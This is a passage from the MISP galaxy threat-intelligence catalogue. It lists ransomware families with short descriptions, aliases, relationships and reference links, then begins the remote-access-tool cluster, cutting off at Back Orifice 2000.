  • uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

Table 8591. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcat

https://1-id--ransomware-blogspot-com.translate.goog/2021/12/blackcat-ransomware.html?_x_tr_enc=1&_x_tr_sl=ru&_x_tr_tl=en&_x_tr_hl=ru

https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809

https://github.com/f0wl/blackCatConf

https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/

https://www.varonis.com/blog/alphv-blackcat-ransomware

https://www.intrinsec.com/alphv-ransomware-gang-analysis

https://unit42.paloaltonetworks.com/blackcat-ransomware/

https://www.cyber.gov.au/acsc/view-all-content/advisories/2022-004-acsc-ransomware-profile-alphv-aka-blackcat

https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/

Mount Locker

Ransomware

The tag is: misp-galaxy:ransomware="Mount Locker"

Mount Locker is also known as:

  • Mount-Locker

Table 8592. Table References

Links

https://www.cyclonis.com/mount-locker-ransomware-more-dangerous

https://www.bleepingcomputer.com/news/security/mount-locker-ransomware-joins-the-multi-million-dollar-ransom-game

Pandora

Ransomware

The tag is: misp-galaxy:ransomware="Pandora"

Table 8594. Table References

Links

https://twitter.com/malwrhunterteam/status/1501857263493001217

https://dissectingmalwa.re/blog/pandora

HelloXD

HelloXD is a ransomware family performing double extortion attacks that surfaced in November 2021. During our research we observed multiple variants impacting Windows and Linux systems. Unlike other ransomware groups, this ransomware family doesn’t have an active leak site; instead it prefers to direct the impacted victim to negotiations through TOX chat and onion-based messenger instances.

The tag is: misp-galaxy:ransomware="HelloXD"

Table 8596. Table References

Links

https://unit42.paloaltonetworks.com/helloxd-ransomware/

Maui ransomware

Maui ransomware stands out because of a lack of several key features commonly seen with tooling from RaaS providers, such as an embedded ransom note to provide recovery instructions or automated means of transmitting encryption keys to attackers. Instead, it is believed that Maui is manually operated: operators specify which files to encrypt when executing it and then exfiltrate the resulting runtime artifacts. There are many aspects of Maui ransomware that are unknown, including its usage context.

The tag is: misp-galaxy:ransomware="Maui ransomware"

Table 8597. Table References

Links

https://stairwell.com/wp-content/uploads/2022/07/Stairwell-Threat-Report-Maui-Ransomware.pdf

https://www.cisa.gov/uscert/ncas/alerts/aa22-187a

Lorenz Ransomware

Lorenz is a ransomware group that has been active since at least February 2021 and like many ransomware groups, performs double-extortion by exfiltrating data before encrypting systems.

The tag is: misp-galaxy:ransomware="Lorenz Ransomware"

Table 8598. Table References

Links

https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/

BlackBasta

Black Basta is a new ransomware strain discovered during April 2022 (it appears to have been in development since at least early February 2022). Due to their ability to quickly amass new victims and the style of their negotiations, this is likely not a new operation but rather a rebrand of a previous top-tier ransomware gang that brought along their affiliates.

The tag is: misp-galaxy:ransomware="BlackBasta"

BlackBasta has relationships with:

  • successor-of: misp-galaxy:ransomware="Conti" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:botnet="Qbot" with estimative-language:likelihood-probability="likely"

Table 8601. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.blackbasta

https://www.bleepingcomputer.com/news/security/american-dental-association-hit-by-new-black-basta-ransomware/

https://www.bleepingcomputer.com/news/security/new-black-basta-ransomware-springs-into-action-with-a-dozen-breaches/

https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html

https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape

https://securityintelligence.com/posts/black-basta-ransomware-group-besting-network/

https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware

https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/

https://gbhackers.com/black-basta-ransomware/

https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html

https://securelist.com/luna-black-basta-ransomware/106950/

https://securityscorecard.com/research/a-deep-dive-into-black-basta-ransomware

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta

https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/

https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/

https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

BlackByte

BlackByte is a recently discovered ransomware with a .NET DLL core payload wrapped in JavaScript. It employs heavy obfuscation both in its JavaScript wrapper and its .NET DLL core.

Once the JavaScript wrapper is executed, the malware will de-obfuscate the core payload and execute it in memory. The core .DLL is loaded and BlackByte will check the installed operating system language and terminate if an eastern European language is found.

It will proceed to check for the presence of several anti-virus and sandbox-related .DLLs, attempt to bypass AMSI, delete system shadow-copies in order to hinder system recovery, and modify several other system services (including Windows Firewall) in order to “prep” the system for encryption. Once the system is “ready” for encryption, it will download a symmetric key-file which will be used to encrypt files on the system. If this file is not found, the malware will terminate.

Unlike most Ransomware today, BlackByte uses a single symmetric encryption key, and does not generate a unique encryption key for each victim system, meaning the same key can be used to decrypt all files encrypted by the malware.

This makes for substantially easier key-management for the actors behind BlackByte at the cost of a weaker encryption scheme and easier victim system recovery (as there is only a single online point with a single key to maintain).

As with most Ransomware today, BlackByte has worming capabilities and can infect additional endpoints on the same network.

The tag is: misp-galaxy:ransomware="BlackByte"

BlackByte has relationships with:

  • successor-of: misp-galaxy:ransomware="Conti" with estimative-language:likelihood-probability="likely"

Table 8602. Table References

Links

https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape

https://redcanary.com/blog/blackbyte-ransomware/

https://www.ic3.gov/Media/News/2022/220211.pdf

https://therecord.media/san-francisco-49ers-confirm-ransomware-attack/

https://www.bleepingcomputer.com/news/security/fbi-blackbyte-ransomware-breached-us-critical-infrastructure/

https://www.picussecurity.com/resource/ttps-used-by-blackbyte-ransomware-targeting-critical-infrastructure

https://www.trellix.com/en-us/about/newsroom/stories/research/trellix-global-defenders-analysis-and-protections-for-blackbyte-ransomware.html

https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group

https://www.zscaler.com/blogs/security-research/analysis-blackbyte-ransomwares-go-based-variants

https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups

https://blog.talosintelligence.com/the-blackbyte-ransomware-group-is/

https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape

https://securelist.com/modern-ransomware-groups-ttps/106824/

https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/

https://news.sophos.com/en-us/2022/10/04/blackbyte-ransomware-returns/

RedAlert

Ransomware

The tag is: misp-galaxy:ransomware="RedAlert"

Cheerscrypt

Ransomware

The tag is: misp-galaxy:ransomware="Cheerscrypt"

GwisinLocker

Ransomware

The tag is: misp-galaxy:ransomware="GwisinLocker"

Luna Ransomware

Ransomware

The tag is: misp-galaxy:ransomware="Luna Ransomware"

AvosLocker

In March 2022, the FBI and the U.S. Treasury Financial Crimes Enforcement Network released a joint advisory addressing AvosLocker and their activity targeting organizations across several critical infrastructure sectors. The RaaS gang deploys ransomware onto their victim’s networks and systems, then threatens to leak their files on the dark web if they don’t pay up. AvosLocker is both the name of the RaaS gang, as well as the name of the ransomware itself.

In May 2022, AvosLocker took responsibility for attacking and stealing data from the Texas-based healthcare organization CHRISTUS Health. CHRISTUS Health runs hundreds of healthcare facilities across Mexico, the U.S., and South America. The group stole information from a cancer patient registry which included names, social security numbers, diagnoses, dates of birth, and other medical information. The nonprofit Catholic health system has more than 600 healthcare facilities in Texas, Louisiana, New Mexico, and Arkansas. There are also facilities in Colombia, Mexico, and Chile.

Fortunately, the ransomware attack was quickly identified and was limited. While other healthcare organizations have not been as fortunate with ransomware attacks, the AvosLocker attack didn’t impact CHRISTUS Health’s patient care or clinical operations. CHRISTUS Health didn’t reveal whether or not the security incident included ransomware, data exfiltration or extortion, but due to AvosLocker’s reputation, it is more than likely that the incident included at least one of the three.

The tag is: misp-galaxy:ransomware="AvosLocker"

AvosLocker is also known as:

  • Avos

Table 8603. Table References

Links

https://www.avertium.com/resources/threat-reports/in-depth-look-at-avoslocker-ransomware

https://unit42.paloaltonetworks.com/atoms/avoslocker-ransomware/

https://www.kroll.com/en/insights/publications/cyber/avoslocker-ransomware-update

https://www.picussecurity.com/resource/avos-locker-ransomware-group

https://brandefense.io/blog/ransomware/in-depth-analysis-of-avoslocker-ransomware/

https://blog.talosintelligence.com/avoslocker-new-arsenal/

https://www.techrepublic.com/article/avos-ransomware-updates-attack/

https://www.tripwire.com/state-of-security/avoslocker-ransomware-what-you-need-to-know

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker

https://malpedia.caad.fkie.fraunhofer.de/details/elf.avoslocker

https://malpedia.caad.fkie.fraunhofer.de/details/win.avos_locker

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

https://blogs.blackberry.com/en/2022/04/threat-thursday-avoslocker-prompts-advisory-from-fbi-and-fincen

https://www.ic3.gov/Media/News/2022/220318.pdf

https://blog.qualys.com/vulnerabilities-threat-research/2022/03/06/avoslocker-ransomware-behavior-examined-on-windows-linux

https://blog.lexfo.fr/Avoslocker.html

https://blogs.vmware.com/security/2022/02/avoslocker-modern-linux-ransomware-threats.html

https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/

https://www.malwarebytes.com/blog/threat-intelligence/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners

https://unit42.paloaltonetworks.com/emerging-ransomware-groups/

https://news.sophos.com/en-us/2021/12/22/avos-locker-remotely-accesses-boxes-even-running-in-safe-mode/

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://cdn.pathfactory.com/assets/10555/contents/400686/13f4424c-05b4-46db-bb9c-6bf9b5436ec4.pdf

https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html

https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape

PLAY Ransomware

Ransomware

The tag is: misp-galaxy:ransomware="PLAY Ransomware"

Qyick Ransomware

Ransomware

The tag is: misp-galaxy:ransomware="Qyick Ransomware"

Agenda Ransomware

Ransomware

The tag is: misp-galaxy:ransomware="Agenda Ransomware"

Karakurt

Ransomware

The tag is: misp-galaxy:ransomware="Karakurt"

0Mega

0mega, a new ransomware operation, has been observed targeting organizations around the world. The ransomware operators are launching double-extortion attacks and demanding millions of dollars as ransom.

The 0mega ransomware operation launched in May and has already claimed multiple victims. 0mega maintains a dedicated data leak site that the attackers use to post stolen data if the demanded ransom is not paid. The leak site currently hosts 152 GB of data stolen from an electronics repair firm in an attack that happened in May. However, an additional victim has since been removed, implying that they might have paid the ransom to the 0mega group.

How does it work? Hackers add the .0mega extension to the encrypted file’s names and create ransom notes (DECRYPT-FILES[.]txt). The ransom note has a link to a Tor payment negotiation site with a support chat to reach out to the ransomware group. To log in to this site, the victims are asked to upload their ransom notes with a unique Base64-encoded blob identity.

The tag is: misp-galaxy:ransomware="0Mega"

Table 8604. Table References

Links

https://www.bleepingcomputer.com/news/security/new-0mega-ransomware-targets-businesses-in-double-extortion-attacks/

https://cyware.com/news/new-0mega-ransomware-joins-the-double-extortion-threat-landscape-158fb321

Abraham’s Ax

Abraham’s Ax announced their existence and mission through social media channels such as Twitter posts on November 8, 2022. Abraham’s Ax use a WordPress blog as the basis for their leak sites. The Abraham’s Ax site is available in Hebrew, Farsi, and English. The site also provides versions available via Tor websites, although these appeared to be under construction at the time of analysis. The domain used is registered with EgenSajt.se.

The tag is: misp-galaxy:ransomware="Abraham’s Ax"

Abraham’s Ax is also known as:

  • Abrahams_Ax

Table 8605. Table References

Links

https://www.secureworks.com/blog/abrahams-ax-likely-linked-to-moses-staff

aGl0bGVyCg

Ransomware

The tag is: misp-galaxy:ransomware="aGl0bGVyCg"

aGl0bGVyCg has relationships with:

  • similar: misp-galaxy:ransomware="Hitler" with estimative-language:likelihood-probability="unlikely"

Table 8606. Table References

Links

https://raw.githubusercontent.com/stamparm/maltrail/master/trails/static/malware/hitler_ransomware.txt

https://twitter.com/fr0s7_/status/1460229982278541315

Ako

Once installed, Ako will attempt to delete Volume Shadow Copies and disable recovery services. It will then begin to encrypt all files that do not match a hard-coded list using an unknown algorithm. Whilst this is happening, Ako will scan the affected network for any connected devices or drives for it to propagate to.

The tag is: misp-galaxy:ransomware="Ako"

Ako is also known as:

  • MedusaReborn

Table 8607. Table References

Links

https://digital.nhs.uk/cyber-alerts/2020/cc-3345

https://www.pcrisk.com/removal-guides/16737-ako-ransomware

https://www.pcrisk.com/images/stories/screenshots202001/ako-ransom-note-second_variant.jpg

https://www.pcrisk.com/images/stories/screenshots202004/ako-ransomware-update-2020-04-09-text-file.jpg

https://www.pcrisk.com/images/stories/screenshots202004/ako-update-2020-04-21-text-file.jpg

https://www.pcrisk.com/images/stories/screenshots202004/ako-update-2020-04-21-html-file.jpg

https://www.pcrisk.com/images/stories/screenshots202010/ako-ransomware-update-2020-10-15-text-file.gif

Arvinclub

Arvin Club is a popular ransomware group with a widespread Telegram presence, which includes personal group chats and official channels. The group recently launched their official TOR/Onion website to update their status and release details of their latest attacks and data breaches. Their latest target is Kendriya Vidyalaya, a chain of schools in India. The group has exposed the Personally Identifiable Information (PII) of some students.

The tag is: misp-galaxy:ransomware="Arvinclub"

Arvinclub is also known as:

  • Arvin Club

Avaddon

Avaddon is a ransomware malware targeting Windows systems often spread via malicious spam. The first known attack where Avaddon ransomware was distributed was in February 2020. Avaddon encrypts files using the extension .avdn and uses a TOR payment site for the ransom payment.

The tag is: misp-galaxy:ransomware="Avaddon"

Table 8609. Table References

Links

https://heimdalsecurity.com/blog/avaddon-ransomware/

https://atos.net/en/lp/securitydive/avaddon-ransomware-analysis

Avos

The tag is: misp-galaxy:ransomware="Avos"

Avos has relationships with:

  • similar: misp-galaxy:ransomware="AvosLocker" with estimative-language:likelihood-probability="very-likely"

Aztroteam

The tag is: misp-galaxy:ransomware="Aztroteam"

Babuk-Locker

The tag is: misp-galaxy:ransomware=" Babuk-Locker"

Babuk-Locker has relationships with:

  • similar: misp-galaxy:ransomware="Babuk Ransomsware" with estimative-language:likelihood-probability="very-likely"

Babyduck

The tag is: misp-galaxy:ransomware="Babyduck"

Table 8610. Table References

Links

https://twitter.com/PolarToffee/status/1445873002801889280/photo/3

Bianlian

BianLian used subtle techniques to exploit, enumerate, and move laterally in victim networks to remain undetected and aggressively worked to counter Endpoint Detection & Response (EDR) protections during the encryption phase of their operations. The group has displayed signs of being new to the practical business aspects of ransomware and associated logistics. Generally they seemed to be experiencing the growing pains of a group of talented hackers new to this aspect of criminal extortion.

Infrastructure associated with the BianLian group first appeared online in December 2021 and their toolset appears to have been under active development since then. Finally, we have observed the BianLian threat actor tripling their known command and control (C2) infrastructure in the month of August, suggesting a possible increase in the actor’s operational tempo.

The tag is: misp-galaxy:ransomware="Bianlian"

Bianlian is also known as:

  • Hydra

Bianlian has relationships with:

  • similar: misp-galaxy:ransomware="Hydra" with estimative-language:likelihood-probability="likely"

Table 8611. Table References

Links

https://blog.cyble.com/2022/08/18/bianlian-new-ransomware-variant-on-the-rise/

https://blogs.blackberry.com/en/2022/10/bianlian-ransomware-encrypts-files-in-the-blink-of-an-eye

https://cryptax.medium.com/android-bianlian-payload-61febabed00a

https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221

https://cryptax.medium.com/creating-a-safe-dummy-c-c-to-test-android-bots-ffa6e7a3dce5

https://cryptax.medium.com/multidex-trick-to-unpack-android-bianlian-ed52eb791e56

https://cryptax.medium.com/quick-look-into-a-new-sample-of-android-bianlian-bc5619efa726

https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/

https://rhisac.org/threat-intelligence/bianlian-ransomware-expanding-c2-infrastructure-and-operational-tempo/

https://twitter.com/malwrhunterteam/status/1558548947584548865

https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware

https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html

https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Hunting-the-Android-BianLian-botnet.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Hunting-the-Android-BianLian-botnet.pdf

https://www.youtube.com/watch?v=DPFcvSy4OZk

Blackshadow

The tag is: misp-galaxy:ransomware="Blackshadow"

Blacktor

The tag is: misp-galaxy:ransomware="Blacktor"

Bluesky

The tag is: misp-galaxy:ransomware="Bluesky"

Bonacigroup

The tag is: misp-galaxy:ransomware="Bonacigroup"

Cheers

The tag is: misp-galaxy:ransomware="Cheers"

Cooming

The tag is: misp-galaxy:ransomware="Cooming"

Crylock

The tag is: misp-galaxy:ransomware="Crylock"

Crylock is also known as:

  • Cryakl

Cuba

The tag is: misp-galaxy:ransomware="Cuba"

Cuba is also known as:

  • COLDDRAW

Daixin

The tag is: misp-galaxy:ransomware="Daixin"

Dark Power

The tag is: misp-galaxy:ransomware="Dark Power"

Darkangel

The tag is: misp-galaxy:ransomware="Darkangel"

Darkbit01

The tag is: misp-galaxy:ransomware="Darkbit01"

Dataleak

The tag is: misp-galaxy:ransomware="Dataleak"

Diavol

The tag is: misp-galaxy:ransomware="Diavol"

Donutleaks

The tag is: misp-galaxy:ransomware="Donutleaks"

Endurance

The tag is: misp-galaxy:ransomware="Endurance"

Entropy

The tag is: misp-galaxy:ransomware="Entropy"

Ep918

The tag is: misp-galaxy:ransomware="Ep918"

Everest

The tag is: misp-galaxy:ransomware="Everest"

Freecivilian

The tag is: misp-galaxy:ransomware="Freecivilian"

Fsteam

The tag is: misp-galaxy:ransomware="Fsteam"

Grief

The tag is: misp-galaxy:ransomware="Grief"

Groove

The tag is: misp-galaxy:ransomware="Groove"

Haron

The tag is: misp-galaxy:ransomware="Haron"

Hotarus

The tag is: misp-galaxy:ransomware="Hotarus"

Icefire

The tag is: misp-galaxy:ransomware="Icefire"

Justice_Blade

The tag is: misp-galaxy:ransomware="Justice_Blade"

Kelvin Security

The tag is: misp-galaxy:ransomware="Kelvin Security"

Lapsus$

The tag is: misp-galaxy:ransomware="Lapsus$"

Lilith

The tag is: misp-galaxy:ransomware="Lilith"

Lockbit3

The tag is: misp-galaxy:ransomware="Lockbit3"

Lockbit3 has relationships with:

  • similar: misp-galaxy:ransomware="LockBit" with estimative-language:likelihood-probability="likely"

Lolnek

The tag is: misp-galaxy:ransomware="Lolnek"

Lv

The tag is: misp-galaxy:ransomware="Lv"

Mallox

The tag is: misp-galaxy:ransomware="Mallox"

Mbc

The tag is: misp-galaxy:ransomware="Mbc"

Midas

The tag is: misp-galaxy:ransomware="Midas"

Moisha

The tag is: misp-galaxy:ransomware="Moisha"

Monte

The tag is: misp-galaxy:ransomware="Monte"

Monti

The tag is: misp-galaxy:ransomware="Monti"

Mydecryptor

The tag is: misp-galaxy:ransomware="Mydecryptor"

N3Tworm

The tag is: misp-galaxy:ransomware="N3Tworm"

Netwalker

The tag is: misp-galaxy:ransomware="Netwalker"

Nevada

The tag is: misp-galaxy:ransomware="Nevada"

Nightsky

The tag is: misp-galaxy:ransomware="Nightsky"

Nokoyawa

The tag is: misp-galaxy:ransomware="Nokoyawa"

Onepercent

The tag is: misp-galaxy:ransomware="Onepercent"

Payloadbin

The tag is: misp-galaxy:ransomware="Payloadbin"

Prometheus

The tag is: misp-galaxy:ransomware="Prometheus"

Qilin

The tag is: misp-galaxy:ransomware="Qilin"

Qlocker

The tag is: misp-galaxy:ransomware="Qlocker"

Ramp

The tag is: misp-galaxy:ransomware="Ramp"

Ransomcartel

The tag is: misp-galaxy:ransomware="Ransomcartel"

Ransomhouse

The tag is: misp-galaxy:ransomware="Ransomhouse"

Ranzy

The tag is: misp-galaxy:ransomware="Ranzy"

Relic

The tag is: misp-galaxy:ransomware="Relic"

Royal

The tag is: misp-galaxy:ransomware="Royal"

Rransom

The tag is: misp-galaxy:ransomware="Rransom"

Sabbath

The tag is: misp-galaxy:ransomware="Sabbath"

Solidbit

The tag is: misp-galaxy:ransomware="Solidbit"

Sparta

The tag is: misp-galaxy:ransomware="Sparta"

Spook

The tag is: misp-galaxy:ransomware="Spook"

Stormous

The tag is: misp-galaxy:ransomware="Stormous"

Unknown

The tag is: misp-galaxy:ransomware="Unknown"

Unsafe

The tag is: misp-galaxy:ransomware="Unsafe"

V Is Vendetta

The tag is: misp-galaxy:ransomware="V Is Vendetta"

V Is Vendetta has relationships with:

  • similar: misp-galaxy:ransomware="Samas-Samsam" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Vendetta" with estimative-language:likelihood-probability="likely"

Vfokx

The tag is: misp-galaxy:ransomware="Vfokx"

Vicesociety

The tag is: misp-galaxy:ransomware="Vicesociety"

Vsop

The tag is: misp-galaxy:ransomware="Vsop"

Xinglocker

The tag is: misp-galaxy:ransomware="Xinglocker"

Xinof

The tag is: misp-galaxy:ransomware="Xinof"

Yanluowang

The tag is: misp-galaxy:ransomware="Yanluowang"

RAT

A remote administration tool or remote access tool (RAT), sometimes also called a remote access trojan, is a piece of software or programming that allows a remote "operator" to control a system as if they had physical access to that system.

RAT is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Various - raw-data

Iperius Remote

Iperius Remote is advertised with these features: Control remotely any computer with Iperius Remote Desktop Free. For remote support or presentations. Ideal for technical assistance. Easy to use and secure.

The tag is: misp-galaxy:rat="Iperius Remote"

Table 8612. Table References

Links

https://www.iperiusremote.com

TeamViewer

TeamViewer is a proprietary computer software package for remote control, desktop sharing, online meetings, web conferencing and file transfer between computers.

The tag is: misp-galaxy:rat="TeamViewer"

Table 8613. Table References

Links

https://www.teamviewer.com

JadeRAT

JadeRAT is just one example of numerous mobile surveillanceware families we’ve seen in recent months, indicating that actors are continuing to incorporate mobile tools in their attack chains. Threat actor, using a tool called JadeRAT, targets the mobile phones of ethnic minorities in China, notably Uighurs, for the purpose of espionage.

The tag is: misp-galaxy:rat="JadeRAT"

JadeRAT has relationships with:

  • similar: misp-galaxy:malpedia="JadeRAT" with estimative-language:likelihood-probability="likely"

Table 8614. Table References

Links

https://blog.lookout.com/mobile-threat-jaderat

https://www.cfr.org/interactive/cyber-operations/jaderat

Back Orifice

Back Orifice (often shortened to BO) is a computer program designed for remote system administration. It enables a user to control a computer running the Microsoft Windows operating system from a remote location.

The tag is: misp-galaxy:rat="Back Orifice"

Back Orifice is also known as:

  • BO

Table 8615. Table References

Links

http://www.cultdeadcow.com/tools/bo.html

http://www.symantec.com/avcenter/warn/backorifice.html

Netbus

NetBus or Netbus is a software program for remotely controlling a Microsoft Windows computer system over a network. It was created in 1998 and has been very controversial for its potential of being used as a backdoor.

The tag is: misp-galaxy:rat="Netbus"

Netbus is also known as:

  • NetBus

Table 8616. Table References

Links

http://www.symantec.com/avcenter/warn/backorifice.html

https://www.f-secure.com/v-descs/netbus.shtml

PoisonIvy

Poison Ivy is a RAT which was freely available and first released in 2005.

The tag is: misp-galaxy:rat="PoisonIvy"

PoisonIvy is also known as:

  • Poison Ivy

  • Backdoor.Win32.PoisonIvy

  • Gen:Trojan.Heur.PT

PoisonIvy has relationships with:

  • similar: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Poison Ivy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="poisonivy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Poison Ivy" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="APT14" with estimative-language:likelihood-probability="likely"

Table 8617. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf

https://www.f-secure.com/v-descs/backdoor_w32_poisonivy.shtml

Sub7

Sub7, or SubSeven or Sub7Server, is a Trojan horse program. Its name was derived by spelling NetBus backwards ("suBteN") and swapping "ten" with "seven". Sub7 was created by Mobman. Mobman has not maintained or updated the software since 2004; however, an author known as Read101 has carried on the Sub7 legacy.

The tag is: misp-galaxy:rat="Sub7"

Sub7 is also known as:

  • SubSeven

  • Sub7Server

Table 8618. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2001-020114-5445-99

Beast Trojan

Beast is a Windows-based backdoor trojan horse, more commonly known in the hacking community as a Remote Administration Tool or a "RAT". It is capable of infecting versions of Windows from 95 to 10.

The tag is: misp-galaxy:rat="Beast Trojan"

Table 8619. Table References

Links

https://en.wikipedia.org/wiki/Beast_(Trojan_horse)

Bifrost

Bifrost is a discontinued backdoor trojan horse family of more than 10 variants which can infect Windows 95 through Windows 10 (although on modern Windows systems, after Windows XP, its functionality is limited). Bifrost uses the typical server, server builder, and client backdoor program configuration to allow a remote attacker, who uses the client, to execute arbitrary code on the compromised machine (which runs the server whose behavior can be controlled by the server editor).

The tag is: misp-galaxy:rat="Bifrost"

Table 8620. Table References

Links

https://www.revolvy.com/main/index.php?s=Bifrost%20(trojan%20horse)&item_type=topic

http://malware-info.blogspot.lu/2008/10/bifrost-trojan.html

Blackshades

Blackshades is the name of a malicious trojan horse used by hackers to control computers remotely. The malware targets computers using Microsoft Windows-based operating systems. According to US officials, over 500,000 computer systems have been infected worldwide with the software.

The tag is: misp-galaxy:rat="Blackshades"

Blackshades has relationships with:

  • similar: misp-galaxy:tool="Blackshades" with estimative-language:likelihood-probability="likely"

Table 8621. Table References

Links

https://krebsonsecurity.com/2014/05/blackshades-trojan-users-had-it-coming/

DarkComet

DarkComet is a Remote Administration Tool (RAT) which was developed by Jean-Pierre Lesueur (known as DarkCoderSc), an independent programmer and computer security coder from the United Kingdom. Although the RAT was developed back in 2008, it began to proliferate at the start of 2012.

The tag is: misp-galaxy:rat="DarkComet"

DarkComet is also known as:

  • Dark Comet

DarkComet has relationships with:

  • similar: misp-galaxy:tool="Dark Comet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="DarkComet" with estimative-language:likelihood-probability="likely"

Table 8622. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/

https://blogs.cisco.com/security/talos/darkkomet-rat-spam

Lanfiltrator

Backdoor.Lanfiltrator is a backdoor Trojan that gives an attacker unauthorized access to a compromised computer. The detection is used for a family of Trojans that are produced by the Backdoor.Lanfiltrator generator.

The tag is: misp-galaxy:rat="Lanfiltrator"

Table 8623. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2002-121116-0350-99

Win32.HsIdir

Win32.HsIdir is an advanced remote administration tool written by its original author, HS32-Idir, and developed through releases made since 2006 (Copyright © 2006-2010 HS32-Idir).

The tag is: misp-galaxy:rat="Win32.HsIdir"

Table 8624. Table References

Links

http://lexmarket.su/thread-27692.html

https://www.nulled.to/topic/129749-win32hsidir-rat/

Optix Pro

Optix Pro is a configurable remote access tool or Trojan, similar to SubSeven or BO2K.

The tag is: misp-galaxy:rat="Optix Pro"

Table 8625. Table References

Links

https://en.wikipedia.org/wiki/Optix_Pro

https://www.symantec.com/security_response/writeup.jsp?docid=2002-090416-0521-99

https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20208

Back Orifice 2000

Back Orifice 2000 (often shortened to BO2k) is a computer program designed for remote system administration. It enables a user to control a computer running the Microsoft Windows operating system from a remote location. The name is a pun on Microsoft BackOffice Server software. Back Orifice 2000 is a new version of the famous Back Orifice backdoor trojan (hacker’s remote access tool). It was created by the Cult of the Dead Cow hacker group in July 1999. Originally, BO2K was released as a source code and utilities package on a CD-ROM. There are reports that some files on that CD-ROM were infected with the CIH virus, so people who got that CD might have been infected and spread not only the compiled backdoor but also the CIH virus.

The tag is: misp-galaxy:rat="Back Orifice 2000"

Back Orifice 2000 is also known as:

  • BO2k

Table 8626. Table References

Links

